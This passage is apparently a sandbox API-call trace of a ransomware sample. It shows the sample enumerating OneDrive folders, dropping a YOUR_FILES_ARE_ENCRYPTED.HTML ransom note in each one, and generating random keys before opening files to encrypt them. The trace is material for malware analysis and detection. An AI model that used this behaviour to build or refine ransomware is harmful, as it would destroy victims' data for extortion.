2 [0113.815] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="28") returned 2 [0113.815] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="27") returned 2 [0113.815] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="F1") returned 2 [0113.815] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="D3") returned 2 [0113.815] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="69") returned 2 [0113.815] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="84") returned 2 [0113.815] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="62") returned 2 [0113.815] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="FD") returned 2 [0113.815] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="0E") returned 2 [0113.815] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="BB") returned 2 [0113.815] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="E5") returned 2 [0113.815] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="1A") returned 2 [0113.815] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="B8") returned 2 [0113.815] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="83") returned 2 [0113.815] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="5A") returned 2 [0113.815] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="69") returned 2 [0113.815] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="54") returned 2 [0113.815] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="4B") returned 2 [0113.815] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="DC") returned 2 [0113.815] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="67") returned 2 [0113.815] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="5C") returned 2 [0113.815] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="2B") returned 2 [0113.815] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="8A") returned 2 [0113.815] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="BA") returned 2 [0113.815] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="DE") returned 2 [0113.815] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="46") returned 2 [0113.815] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="13") returned 2 [0113.815] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="5F") returned 2 [0113.816] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\RemoteAccess.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\RemoteAccess.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\RemoteAccess.dll" [0113.816] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.816] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0113.816] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2637d1c9, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2637d1c9, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2637d1c9, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ro", cAlternateFileName="")) returned 1 [0113.816] StrStrIW (lpFirst="ro", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.816] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ro") returned 78 [0113.816] GetProcessHeap () returned 0x600000 [0113.816] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0113.817] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ro" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ro") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ro" [0113.817] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ro", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ro\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ro\\*" [0113.817] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ro\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2637d1c9, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2637d1c9, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x26969b00, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1407149, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0113.818] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2637d1c9, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2637d1c9, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x26969b00, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1407149, cFileName="..", cAlternateFileName="")) returned 1 [0113.818] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26969b00, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x26969b00, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x26f2857f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0x1407149, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.818] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.818] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ro\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.818] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.818] lstrlenW (lpString=".mui") returned 4 [0113.818] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.818] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26969b00, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x26969b00, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x26f2857f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0x1407149, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.818] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0113.818] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ro\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.818] GetProcessHeap () returned 0x600000 [0113.818] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ro\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\ro\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0113.819] WriteFile (in: hFile=0x310, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.820] CloseHandle (hObject=0x310) returned 1 [0113.820] GetProcessHeap () returned 0x600000 [0113.820] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.820] GetProcessHeap () returned 0x600000 [0113.820] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.820] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x270b6864, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x270b6864, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x270b6864, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ru", cAlternateFileName="")) returned 1 [0113.820] StrStrIW (lpFirst="ru", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.820] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ru") returned 78 [0113.820] GetProcessHeap () returned 0x600000 [0113.820] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0113.820] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ru" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ru") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ru" [0113.820] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ru", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ru\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ru\\*" [0113.820] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ru\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x270b6864, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x270b6864, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x275b3298, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1407149, cFileName=".", cAlternateFileName="")) returned 0x626978 [0113.821] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x270b6864, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x270b6864, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x275b3298, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1407149, cFileName="..", cAlternateFileName="")) returned 1 [0113.821] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x275b3298, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x275b3298, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x27d029e2, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0x1407149, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.821] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.821] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ru\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.821] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.821] lstrlenW (lpString=".mui") returned 4 [0113.821] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.821] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x275b3298, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x275b3298, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x27d029e2, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0x1407149, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.821] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0113.821] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ru\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.821] GetProcessHeap () returned 0x600000 [0113.821] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.821] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ru\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\ru\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0113.821] WriteFile (in: hFile=0x310, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.822] CloseHandle (hObject=0x310) returned 1 [0113.822] GetProcessHeap () returned 0x600000 [0113.823] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.823] GetProcessHeap () returned 0x600000 [0113.823] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.824] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27e76442, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x27e76442, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x27e76442, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="rw", cAlternateFileName="")) returned 1 [0113.824] StrStrIW (lpFirst="rw", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.824] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\rw") returned 78 [0113.824] GetProcessHeap () returned 0x600000 [0113.824] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0113.825] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\rw" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\rw") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\rw" [0113.825] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\rw", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\rw\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\rw\\*" [0113.825] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\rw\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27e76442, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x27e76442, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x281e3bed, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1407149, cFileName=".", cAlternateFileName="")) returned 0x626838 [0113.825] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27e76442, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x27e76442, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x281e3bed, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1407149, cFileName="..", cAlternateFileName="")) returned 1 [0113.825] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x281e3bed, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x281e3bed, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x28445fae, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0x1407149, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.825] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.825] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\rw\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.825] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.825] lstrlenW (lpString=".mui") returned 4 [0113.825] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.825] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x281e3bed, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x281e3bed, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x28445fae, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0x1407149, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.826] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0113.826] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\rw\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.826] GetProcessHeap () returned 0x600000 [0113.826] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.827] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\rw\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\rw\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0113.827] WriteFile (in: hFile=0x310, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.830] CloseHandle (hObject=0x310) returned 1 [0113.830] GetProcessHeap () returned 0x600000 [0113.830] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.830] GetProcessHeap () returned 0x600000 [0113.830] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.832] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x178673a6, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x178673a6, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x18f80014, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x124b, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ScreenshotLogo.png", cAlternateFileName="SCREEN~1.PNG")) returned 1 [0113.832] StrStrIW (lpFirst="ScreenshotLogo.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.832] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ScreenshotLogo.png") returned 94 [0113.832] PathFindExtensionW (pszPath="ScreenshotLogo.png") returned=".png" [0113.832] lstrlenW (lpString=".png") returned 4 [0113.832] PathFindExtensionW (pszPath="ScreenshotLogo.png") returned=".png" [0113.832] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.832] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ScreenshotLogo.png" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\screenshotlogo.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0113.834] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=4683) returned 1 [0113.834] GetProcessHeap () returned 0x600000 [0113.834] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0113.837] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="4E") returned 2 [0113.837] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="89") returned 2 [0113.837] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="45") returned 2 [0113.837] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="53") returned 2 [0113.837] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="12") returned 2 [0113.837] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="F1") returned 2 [0113.837] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="C1") returned 2 [0113.837] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="24") returned 2 [0113.837] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="F3") returned 2 [0113.837] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="E8") returned 2 [0113.837] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="CB") returned 2 [0113.837] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="F8") returned 2 [0113.837] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="C4") returned 2 [0113.837] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="19") returned 2 [0113.837] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="AF") returned 2 [0113.837] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="D1") returned 2 [0113.837] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="69") returned 2 [0113.837] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="86") returned 2 [0113.837] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="EC") returned 2 [0113.837] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="F9") returned 